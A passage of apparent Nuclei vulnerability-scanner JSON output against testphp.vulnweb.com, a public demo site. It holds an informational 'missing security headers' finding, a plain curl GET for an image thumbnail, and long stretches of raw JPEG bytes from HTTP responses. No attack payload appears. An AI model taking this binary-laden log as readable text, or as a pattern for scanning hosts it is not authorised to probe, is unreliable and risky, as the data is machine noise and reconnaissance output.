000f\\ufffd\\ufffd\\ufffd\\ufffdԯ\\ufffd!\\ufffdb\\ufffd$\\ufffd\\ufffdx\\ufffd\\ufffd\\ufffd?\\ufffd\\ufffd\\ufffdU\\ufffdKo\\ufffd\\ufffdq\\ufffd\\ufffd\\ufffd@\\ufffd\\ufffd\\ufffd\\u0016f\\\\*㑜\\u0001\\ufffd\\ufffd\\ufffdI\\ufffd4\\ufffd\\ufffdi\\ufffd\\ufffdIyܤQ\\ufffd\\ufffdҾ\\ufffd\\ufffdX`\\u0005’A\\ufffd'\\u0004`.y\\ufffd\\ufffd/\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffd6\\ufffd\\ufffd\\u001f\\ufffdg\\u0008\\ufffd\\ufffd4i-\\ufffdz:\\ufffd\\u0011gP\\ufffd\\ufffdQ\\ufffd0\\ufffd\\u0011\\ufffd\\ufffdi\\ufffd\\ufffd\\ufffd'\\ufffd\\ufffd\\ufffddG[\\ufffd\\u001c\\ufffd\\u001fO8a\\ufffd\\u0006F\\u0008\\ufffd{\\ufffd\\ufffdt}D\\ufffd\\ufffd\\ufffd5\\u0008\\ufffd\\ufffd0!\\ufffd\\ufffd\\u0012\\ufffd\\u000c9\\u001d\\ufffd\\ufffd\\ufffd2s\\ufffd5\\ufffdu\\r\\u003e\\ufffdloo\\ufffd\\ufffd]\\u001cY\\ufffd\\ufffd\\ufffd+.v\\ufffd\\u003e\\ufffd\\ufffd(@\\ufffd\\u0001 \\u0013\\ufffdL'\\ufffdt\\ufffd\\ufffd9Y\\ufffd\\ufffdTs\\ufffd\\ufffd5\\ufffd5l\\ufffd\\u000b\\ufffd\\\"m\\ufffd\\u001c\\ufffd\\ufffd\\ufffdp\\ufffd\\ufffd\\ufffdL\\u000c\\ufffd\\ufffd5\\ufffdo48\\ufffdNE;U%\\ufffd\\ufffd,\\ufffd\\ufffdm\\u0007h\\ufffd'\\ufffd@\\ufffdy\\u0002\\ufffd}R \\ufffd\\ufffd-\\ufffd\\ufffd\\ufffd\\u0000\\n\\ufffdpO\\u001f\\ufffd5\\ufffdU\\ufffd\\ufffdh\\ufffd\\ufffd\\u0015\\ufffd\\ufffdX\\ufffd\\ufffd\\ufffdN\\u003e\\ufffd\\ufffd㑭g\\u001704\\ufffd!V\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001fW\\ufffdO\\ufffd\\u0007\\ufffd\\ufffd\\u000bk\\t\\u0007\\ufffd\\ufffd\\ufffd%[Y\\ufffdC\\u0012\\ufffd\\ufffdA]Č\\u0010A\\ufffdG\\ufffd]\\u001a\\ufffd\\ufffd\\ufffd\\ufffd\\u001eL\\ufffd\\ufffdY\\ufffd9\\ufffdcX\\ufffd\\ufffdI!\\ufffd\\ufffdVF#*\\u0003.\\u00187\\u001fP\\u003c\\ufffd\\u0000\\t\\ufffd\\u003c\\ufffdՑ\\ufffdI}$\\ufffd\\\"\\ufffd\\ufffdv\\ufffd\\ufffd\\n\\ufffd\\ufffd\\u003e\\ufffdx\\ufffdd\\ufffd\\ufffd\\ufffd\\r\\ufffd\\u001f\\ufffd\\ufffdM\\ufffdu\\ufffd}+\\ufffd\\u0008 \\u001f\\ufffd\\u0003\\u0000\\ufffd\\ufffd\\ufffd\\u0019M\\ufffd'\\ufffd\\ufffdY#\\ufffdf%[\\ufffd[\\ufffd\\u003ej\\ufffd\\ufffd6\\ufffd\\u0007,4\\ufffdy\\u001elVh\\ufffdY-\\ufffd\\ufffdH\\ufffd\\ufffd\\u0019\\ufffd\\ufffdd\\ufffd\\ufffdc\\ufffd\\ufffd\\ufffd\\ufffd\\u0003A4~夤{\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd}\\ufffd^\\ufffdۊ\\ufffdY\\u0011\\u001c\\ufffd\\ufffd\\u0005\\u0015\\ufffd\\ufffd\\u0014\\n\\ufffd\\ufffdp\\u0013S\\ufffdE\\u0015D\\u0003\\ufffdbO\\u003c\\ufffd\\ufffd\\u001b\\ufffd0e8 \\ufffdV1R*ѐ\\u0006\\ufffd\\ufffd\\ufffd.\\ufffdm\\u0004\\ufffdOs \\ufffd\\ufffd\\ufffds\\ufffd6H]\\ufffd\\ufffd`\\ufffd\\ufffd\\ufffd\\ufffd3U\\u000b1' \\ufffdx⽣\\u001c\\ufffd\\ufffd%\\ufffd\\ufffd\\ufffd?W\\ufffdg\\ufffd2\\ufffd\\\"F\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0003\\ufffd'\\ufffd\\ufffdO4v\\ufffdi\\ufffd1\\u0012_N\\ufffd\\ufffd=\\ufffd\\u0006\\ufffd\\ufffd\\u0004p\\u003e9?\\u001d\\ufffd+\\ufffd\\ufffd\\ufffdMoq\\u001c\\ufffd\\u0001d`ps\\ufffd\\ufffdW\\u0010\\ufffd\\ufffd\\ufffd\\ufffdsp=ûs\\ufffdO?\\ufffd\\ufffd?\\ufffd\\ufffd\\ufffdDlk+op\\ufffdt\\ufffd\\ufffdEw\\ufffdZ_\\ufffd\\ufffdݐ\\ufffd`VN\\u001c\\ufffd[ \\u000c\\ufffd\\u0015\\ufffdx\\ufffd\\ufffdrMd\\ufffdZD~\\ufffd\\ufffd3%\\ufffdO\\ufffd4\\ufffd7\\u003e\\ufffd3\\ufffd\\u0007\\ufffddc\\u0019$p\\u003cҶ\\ufffd\\ufffd\\ufffd\\ufffdxgc\\ufffd\\ufffdxQ\\ufffd\\u0001\\ufffd4Ţ\\ufffdq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdp#Q\\ufffd?[s\\ufffd\\u001cu\\ufffd\\ufffdk\\ufffdzkj\\ufffd:^%\\ufffdv\\u0019I7\\ufffd\\ufffdU\\ufffd\\\"\\ufffd{\\ufffdɍF\\ufffd\\ufffdBeKd}\\u0001\\ufffdF@a\\ufffd\\ufffd\\ufffd\\u0003\\ufffd\\ufffd\\ufffd\\ufffdۙIPpA\\ufffd\\ufffdNWZ\\ufffd\\u0017\\ufffd\\ufffd\\u0015U}\\ufffdm\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\ufffdH\\r\\ufffdĆ\\u0004s\\ufffd?\\ufffd\\ufffdWv*\\u0016K\\ufffdܬ,#۵]\\ufffd\\ufffd\\ufffd9;A\\u0003\\ufffd9\\u0000.y'\\ufffdZuҩF\\u001a\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffdx34\\ufffd(\\ufffd\\ufffd\\ufffdC\\u0004;\\ufffd\\u0008\\ufffd`%m\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd#?I\\u000c\\u0000\\ufffdx\\u00002\\ufffd\\ufffd\\u0002=\\ufffd\\u0018\\ufffd\\u0005?$\\u001c\\ufffd\\ufffd\\ufffdx,e\\ufffdBM\\u0019u_i\\ufffd\\u001fKl\\ufffd\\u003e\\u0006_\\ufffd\\ufffd \\u000f\\ufffd\\ufffd]\\u0026\\ufffd\\ufffd\\ufffd\\ufffdH\\ufffdSsl\\ufffdtI\\u00260\\ufffd7\\u0001\\ufffd\\ufffd\\ufffd:\\u001eǒ9\\u0015\\u001d.\\ufffd\\ufffd3\\ufffdM\\ufffd\\ufffd\\ufffdC(\\ufffd\\ufffd\\ufffdLѣ}\\u003ev\\ufffd\\ufffd*\\ufffd1\\ufffd\\ufffd\\u003e\\ufffd\\u0007\\u0018$\\ufffd0r\\t\\ufffd~\\ufffdi\\u001d\\ufffd\\ufffdΰF\\ufffd2\\ufffd\\ufffd񗍷3`+\\u0012\\ufffd\\u0018\\ufffd\\ufffd\\u0001\\ufffdH\\ufffdHQ\\ufffd\\ufffdʉmqs\\ufffd\\ufffdgEf\\ufffd-\\ufffd\\ufffd\\u0007gh*3\\ufffd2\\ufffd\\u001b\\u0003\\ufffd\\ufffdq\\ufffd5\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd2-\\ufffd˔\\\"Ux\\ufffd,Y\\ufffd\\u0000\\ufffdv\\n\\ufffd\\ufffd\\u001c\\u000e2AbR\\ufffd\\ufffd6\\ufffdJ\\ufffd\\ufffd\\ufffd=\\ufffd\\ufffd\\ufffd[\\ufffd7\\ufffd\\u0014Q]\\ufffd\\u000f\\u0014T\\ufffd*\\ufffd\\u000c(\\ufffd\\ufffdt\\u0002EM@\\ufffd\\u0015D\\u0002jS\\ufffd\\ufffdEd\\ufffdI\\ufffd\\ufffd\\ufffd32\\ufffd\\ufffd\\ufffdb=\\u001a\\ufffd\\u001a\\u001cV\\ufffd)\\ufffd\\ufffd\\ufffd\\u0001\\ufffd\\t?\\ufffdo۱\\u0015\\u001a5\\ufffd\\ufffd\\ufffdXZU\\ufffdp$3\\u001e8\\u001f\\ufffd\\\\\\ufffd\\u0002x\\ufffdY\\ufffd\\ufffd\\ufffd\\ufffd12\\ufffd\\ufffd\\u0003r\\ufffd?\\ufffd\\ufffdԳ\\ufffd\\ufffd8=ؼ\\ufffdՔ\\ufffde9\\u0004v*\\ufffd\\ufffd\\ufffd,\\u0011f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd8l6d!rz\\u0019$*\\ufffd\\ufffd\\u0001\\ufffd+oC\\ufffd\\ufffd\\ufffd޳J\\ufffdy\\u0002'\\ufffd\\ufffd(9w\\ufffd\\ufffd\\u0007\\ufffd\\u001f\\ufffd\\ufffd\\u0004\\ufffd[S\\ufffd\\u0016{d\\ufffd\\ufffd\\ufffdtL^!\\ufffd\\u0014ۺ \\ufffd;X\\ufffdCt\\ufffd#\\u001e;\\ufffd'\\ufffd\\ufffdk\\ufffd\\ufffd\\ufffd\\ufffduHu\\u001cn\\ufffd\\ufffd4n\\ufffdb\\u000b\\u0013\\ufffd9\\ufffd!o(H\\ufffdV$\\ufffdg\\ufffd!\\ufffd0\\u0007q\\u0019\\ufffd\\ufffd}D\\ufffd:\\ufffd\\ufffd\\u0008w\\ufffdVT`Tgk\\u00021\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdrj\\ufffd\\ufffdk\\ufffd'\\ufffd\\ufffdK\\u0016f\\u0003h\\ufffd\\ufffd\\ufffd\\ufffd[J\\ufffdv\\ufffd\\u001bk\\ufffd\\ufffd \\ufffd,b\\u0011Š\\ufffd\\u0026a\\ufffd\\ufffd\\ufffd\\ufffdX\\u0012\\ufffd2\\ufffdI\\ufffd\\ufffd\\u0002\\ufffd\\ufffdT|\\u003e\\ufffd\\ufffdi4\\ufffd\\ufffd\\ufffd\\ufffdl\\ufffd\\ufffd\\n\\ufffd\\ufffd\\ufffd;eܜu\\ufffd\\ufffd\\ufffd\\u0000|\\ufffdE\\ufffd\\ufffdܶ\\u0000$\\ufffdv\\ufffd\\u0001$\\ufffdN\\u0007\\u0003\\ufffdO\\ufffd\\ufffd}Ci\\u001a\\u0004\\ufffd\\ufffd9\\ufffdl2ZE*I?lq\\ufffd羱Ks[\\ufffd\\u0014\\ufffdӴvq\\ufffd\\ufffdz\\ufffd\\ufffdȩǂMcc\\ufffdQE\\u0015ć\\n\\ufffd(\\ufffd\\ufffdI4\\n(\\ufffd@\\u0026\\ufffdE\\u0015X\\ufffd\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffdЬo4幞6i\\\"i\\u001c\\ufffd\\\\H\\u0001L+\\u000f\\ufffdOX\\u003c\\ufffd\\ufffd\\n+Zڎ\\ufffdB\\ufffdȾ\\ufffda@\\u0019\\ufffdx\\ufffd\\u001d\\n\\u0008澉%@\\ufffd͂\\ufffd\\ufffd)\\ufffd\\ufffd\\ufffd\\u000e\\ufffdV\\ufffdh\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0011\\ufffd\\ufffd!=\\ufffd\\u000c\\u001e?\\ufffd\\ufffd\\ufffd\\ufffdwcmh\\ufffd\\ufffd\\ufffd\\r\\ufffd6|1\\u003c}L\\u0015G\\ufffd@\\n\\u0007\\ufffd\\u0014Q^}\\ufffd~fs\\ufffd\\ufffd!\\ufffd\\u0005\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffdيX\\ufffd\\ufffd\\ufffd\\ufffdWyB\\ufffd\\u003c\\ufffd\\ufffd=\\u001c\\ufffd\\u0019\\ufffd\\ufffdj\\ufffdԒ46dE\\ufffdW\\ufffd#*\\ufffd\\u0002D\\ufffds\\ufffd\\ufffd~\\ufffd\\u001c\\ufffdsE\\u0015\\ufffd\\ufffdb\\ufffd\\ufffd7-\\ufffdI\\ufffd\\\"\\ufffd\\u00126\\ufffd\\ufffdA\\u0006\\ufffd4]\\ufffd\\ufffd]\\u001b\\ufffd\\ufffd5\\ufffd\\u0008cx\\ufffd\\ufffd1\\ufffdъ\\ufffd\\u001c\\ufffdt\\ufffd\\ufffdA\\ufffdS\\ufffd\\ufffd\\ufffdEz\\u003e3\\ufffd\\u000b\\ufffd%|\\ufffd\\ufffd\\ufffdMSF\\ufffd\\ufffd\\ufffd\\n\\ufffdI\\ufffdrG\\ufffd\\ufffd1\\ufffdI\\ufffd:żp\\ufffd\\ufffdl\\u0017r\\ufffd\\u0017\\u0001\\ufffd\\ufffd\\u0002\\ufffd\\u0015\\ufffd\\u001fO\\u0003\\ufffd\\ufffd\\u0001\\ufffd\\u0002\\ufffd(\\ufffdj\\ufffdK\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:25.296096849Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_5) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/9.1.2 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/1.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"content-security-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"path\":\"/pictures/8.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/8.jpg.tn\",\"request\":\"GET /pictures/8.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4139\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:25 GMT\\r\\nEtag: \\\"4dca64a1-102b\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001c\\u0000\\u0000\\u0001\\u0005\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0006\\u0000\\u0002\\u0003\\u0004\\u0005\\u0001\\u0007\\u0008\\ufffd\\ufffd\\u0000;\\u0010\\u0000\\u0001\\u0003\\u0002\\u0004\\u0002\\u0006\\u0008\\u0005\\u0004\\u0002\\u0003\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0005\\u0012!1AQ\\u0006\\u0013\\\"aq\\ufffd\\u00142T\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd$B\\ufffd\\ufffd\\ufffd\\u0015#3\\ufffdRb4r\\ufffd\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0000\\u0003\\u0004\\u0005\\u0006\\u0007\\ufffd\\ufffd\\u0000(\\u0011\\u0000\\u0002\\u0001\\u0003\\u0003\\u0004\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011!\\u0004\\u00141\\u0005\\u0012AQ\\u0013\\u0015\\\"B2ab\\ufffd\\ufffd\\ufffd\\u0000\\u000c\\u0003\\u0001\\u0000\\u0002\\u0011\\u0003\\u0011\\u0000?\\u0000\\ufffdS\\ufffdK\\ufffd\\ufffd@\\ufffd\\u001bU\\u0010z\\ufffd~\\u001d*D\\ufffd\\ufffd\\ufffd@e\\ufffd\\ufffd\\u0012+\\ufffdoQ\\ufffd\\ufffdVߩ\\ufffd}I\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{9%L\\ufffdOy\\u0014ÃX\\ufffdz\\ufffd?\\ufffd\\ufffdh\\ufffd\\\"2\\ufffd\\ufffd0\\u000f\\ufffd5ޤѺ\\ufffd\\u000bU\\ufffd\\ufffdZ|\\u000c\\ufffd\\ufffd\\ufffdvv\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\u0003)\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdR\\ufffd\\ufffd\\ufffdEã\\ufffdo\\ufffdt\\u001f\\u0014\\nc\\ufffd5\\ufffduB\\ufffd\\u000fq\\ufffd\\ufffd\\ufffd\\ufffd\\u001b\\ufffd\\ufffd\\ufffdt\\ufffdH\\ufffd)\\ufffdl\\u0007\\ufffd\\ufffd N\\u0015{\\u001e\\ufffd\\u0003\\ufffdU]\\ufffd7\\u0012`\\ufffd\\tM\\ufffd\\ufffdaT\\ufffd\\ufffdh\\ufffdk\\ufffd-\\u0026\\u001el)=\\ufffd\\u0002\\ufffdF\\u0013k\\ufffd\\ufffd\\u0000\\u0018\\ufffd\\ufffd\\u0000\\ufffdW6\\ufffd\\ufffd$\\ufffd\\ufffdS\\ufffd\\ufffdu\\ufffd\\u000ey\\ufffdeQ\\ufffd\\ufffd\\u0015\\ufffdI9g\\ufffd\\ufffd\\u0017\\ufffd0$\\ufffd\\u0015\\ufffd\\ufffd56\\u000c\\ufffdm\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdN\\ufffdOq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdƲh|\\ufffd\\ufffd\\ufffdI/2\\u001a,-\\ufffd\\ufffd\\ufffd$w\\u001d~uE\\ufffd[ \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\u003c\\ufffdH\\ufffd\\u000c\\ufffd\\ufffd\\u0000;\\ufffd\\u0015R+.A\\ufffd\\ufffdG.F\\u0018K\\u0003vTڞ\\ufffde\\u0013\\ufffd\\ufffd\\u003e\\u0000\\ufffd\\u0002p\\u0007`\\ufffd_\\ufffd:\\ufffd\\u0018\\u0002\\ufffd\\u00000A\\ufffdދ\\ufffdC\\ufffd\\\\!\\ufffd\\u001eJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n\\ufffdH\\ufffdU+Z\\ufffdwQkXBS\\ufffdm\\ufffd\\u0014װ\\ufffd3B\\ufffdȎ\\u0019\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd+J7\\ufffd\\t\\ufffd\\u0000\\ufffdhI\\ufffd\\ufffd\\ufffd\\u0016j\\u0003\\ufffdG΋\\ufffd\\ufffd{C?\\u0018\\ufffd\\u0013`6\\ufffdd\\ufffd\\ufffd3\\ufffd=s\\ufffd\\ufffd`\\ufffd\\ufffd(\\ufffdȟ3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001b'\\ufffd\\ufffdwཥ\\ufffd\\ufffdW\\u0005\\ufffdM|b\\ufffd\\ufffd\\u001fW\\u0000\\u003cظ\\u0007\\ufffd\\t\\ufffd\\u0015Q\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001e%?J3\\ufffd\\u000f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u000e7\\u000c\\ufffdb\\ufffdօt\\ufffd 3\\ufffd.\\u0006\\ufffd\\ufffd\\ufffd趹\\u001f\\ufffd\\ufffd\\ufffd\\ufffdFYl=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdB\\ufffd\\ufffd\\ufffdYO\\ufffd\\u001f\\ufffd\\ufffd\\ufffdC_:i\\ufffd\\ufffdײ\\ufffd\\ufffdFY,=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdb\\ufffd\\ufffd\\ufffdYO\\ufffd\\u0012\\ufffd\\u0007\\ufffde@Gq\\ufffdՅ\\ufffd\\u0026G\\ufffd\\ufffd\\ufffd[\\u000fhg\\ufffd\\u0014\\ufffdX{C?\\u0018\\ufffd\\ufffd\\u0019t\\ufffd \\u00118j\\ufffd\\u0012\\ufffd\\u0011\\ufffdjSa;2G\\ufffd\\u0013F\\ufffd,=\\ufffd\\ufffd\\ufffdRɇ\\ufffdC?\\u0018\\ufffd\\ufffd#\\ufffd\\ufffd`8\\ufffdZOe$yԨ\\ufffdRwfO2h\\ufffd%\\ufffd\\ufffd3\\ufffd\\ufffdYp\\ufffd\\u0000hg\\ufffd\\u00147\\ufffd}6\\ufffd\\ufffd\\u0010\\u000c(\\ufffd\\ufffd\\u001esK\\ufffd\\ufffdDe\\u0003\\ufffdQ\\ufffd\\u0016#k\\ufffd~1K\\ufffd^\\ufffd\\ufffd\\ufffd(oE\\ufffd\\ufffd~\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdOvSL\\u00188V\\ufffd\\u0008O\\ufffd@\\ufffd\\ufffd{K_\\u0018\\ufffdE\\ufffd\\ufffd埌Q\\ufffd1\\ufffdNH\\ufffd\\u001c\\ufffd\\ufffd\\ufffd M\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffd;W$\\ufffdӷ\\ufffd\\r\\ufffd\\rZ\\ufffd$;m\\ufffdc(\\n\\ufffdT\\u0001\\ufffdI\\ufffd4\\ufffd\\ufffd~\\ufffd\\ufffdŅ\\ufffd׽z\\u0016\\ufffd\\u0014 \\u0001\\u0000\\ufffdE\\ufffd$\\ufffdxk\\u001bl8p\\ufffdϨR\\ufffd\\u0008\\ufffd\\u001d-Ŵ;\\ufffd\\ufffd\\ufffdL!\\ufffd\\ufffdV\\u0016\\ufffd\\u0002\\ufffd+\\ufffd\\u0003\\ufffd\\ufffd\\u001f|\\ufffdu\\ufffd\\ufffdb\\u0008k\\ufffd.:\\ufffd\\u0008\\ufffdLƁZ\\ufffdЃ\\ufffdX\\ufffd\\ufffd\\ufffdh/\\ufffd\\ufffd\\ufffd.B\\ufffdeH))!! H\\ufffd!;lg\\ufffd0▪E\\ufffd}P}\\ufffd(\\ufffd\\ufffd\\ufffd)#(%[\\u001d\\ufffd\\ufffd\\ufffdYWQ\\ufffdJ\\ufffd.\\ufffd\\ufffd\\u0000\\ufffd]\\ufffd\\ufffdb/\\u0007\\u0002\\u001cs\\ufffd@P$\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\ufffd\\ufffd\\u0012\\ufffdSM\\ufffd^\\u000e-A\\u0000\\t܉\\ufffdG\\u0018\\ufffd\\u0016\\ufffd\\ufffdo\\u001crԼ\\ufffdE\\ufffdu\\ufffd+*\\ufffd\\ufffd\\ufffd\\u0000F\\ufffd.\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd˶\\ufffd\\u001a\\ufffd\\ufffd-#+\\ufffd7\\u0004J\\u0013\\ufffda\\u001a\\ufffd \\ufffd\\ufffd\\u0002$M\\tu\\u0019\\ufffd\\ufffd\\ufffd;e\\ufffd\\ufffdYx\\ufffd(\\ufffd6\\u001c\\ufffd!\\u0004\\ufffdY\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u000cN\\ufffd\\u0019E\\ufffdn\\ufffd\\ufffd#\\ufffdm\\ufffd\\ufffd9\\ufffd\\ufffd\\ufffdH1\\ufffd\\u001f\\ufffd\\ufffdڠ\\ufffd\\ufffdɈ\\ufffd\\ufffd\\ufffd[j\\u0015\\ufffd!\\ufffd0\\ufffd\\ufffd\\u0003\\u0007\\ufffd\\u0026\\\"\\u000e\\ufffdj)\\ufffd8\\ufffd\\ufffdIq\\ufffdf\\ufffd\\ufffd}\\ufffd\\ufffd\\u0008\\n'|\\ufffd\\ufffd\\ufffd\\ufffdY+7r\\ufffdJ\\u0017\\ufffd7\\ufffdI\\ufffdU~\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGajȩ\\ufffd\\u003e`x\\ufffd\\ufffdĶ\\ufffd\\ufffd8\\ufffd\\ufffd6\\ufffd]:P\\ufffdFE\\ufffd+*Q\\ufffd\\u0012F\\ufffd\\u00065\\u0010\\ufffdTq\\ufffdC\\u0007yƔ\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\u0011\\ufffd=\\ufffd\\ufffd\\u0019'\\ufffdy\\ufffdv\\ufffdl\\ufffdp\\ufffd_\\u000cqn+\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd$q\\u001eQ\\ufffd?\\u001aYW\\ufffd\\ufffd\\ufffd\\ufffd\\u000fd}\\u001a\\ufffd\\ufffdq7\\u0015\\ufffd\\ufffd۔\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\t\\u0002\\u000f\\u00025\\u001ae\\u001cF\\ufffd\\ufffd\\ufffd8\\ufffd$\\ufffd\\u0016\\ufffd\\ufffd\\\\C\\u0004f\\ufffd\\ufffd2\\ufffd\\u0008\\ufffd\\u001a\\ufffd5\\u0011\\ufffd\\ufffd\\ufffd\\u0002\\ufffd\\ufffdî[\\ufffdKL\\ufffdխh%N\\u0013\\ufffdh\\ufffd\\u0004\\ufffd\\u001c\\u0001\\u0000o:\\ufffdd[\\ufffd]\\ufffdY\\\\\\ufffd\\ufffdбd\\ufffdW(\\u0005\\ufffd\\ufffd\\u0003S\\ufffd\\t\\ufffd\\u0013\\ufffd\\ufffdŨ\\ufffd{\\ufffd\\u0013\\ufffd\\u003cX4\\ufffd\\ufffd1\\u000b\\ufffd\\ufffd,ߘ\\u0004\\ufffd\\ufffd\\ufffd\\u0000\\u0012\\ufffd\\ufffd\\u003c9H\\ufffd\\ufffd4\\ufffdX\\ufffd\\ufffd\\r\\ufffdp]Y\\ufffd\\u0003\\ufffd\\u0000\\u0019\\\"7\\ufffdQ\\ufffd\\u0015\\ufffd/\\ufffdww\\ufffdu,\\\\:۩\\ufffd\\u0008\\ufffd*ˤ\\ufffd7\\u0018\\ufffd\\ufffd\\ufffdo\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd`k\\ufffd\\u001a]\\ufffd\\ufffdmEJ%Dd\\ufffd\\ufffd\\\"gS\\ufffd\\ufffd\\ufffd\\u0013\\ufffd=\\n\\ufffdhe\\ufffd\\ufffd1%J/\\u0016\\u000bn\\ufffdQ\\ufffd۾\\ufffd\\u001fq\\ufffd\\u003cم$\\ufffdj\\ufffd=.\\ufffdR\\ufffd/\\ufffdS\\ufffdhO\\u000e\\ufffd\\u0012\\ufffd$\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZe'e\\r9@\\ufffd֯\\ufffdݦ'\\ufffd\\ufffd\\ufffd\\u0012P\\u0014\\ufffd\\u001c\\ufffd\\ufffd\\ufffdse\\ufffd\\ufffd\\u0003A\\ufffd\\ufffdjZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-4\\ufffd\\u0000Y\\u001bk\\ufffd\\ufffd\\ufffd\\u0000\\ufffdr\\ufffdTBGorv\\u001b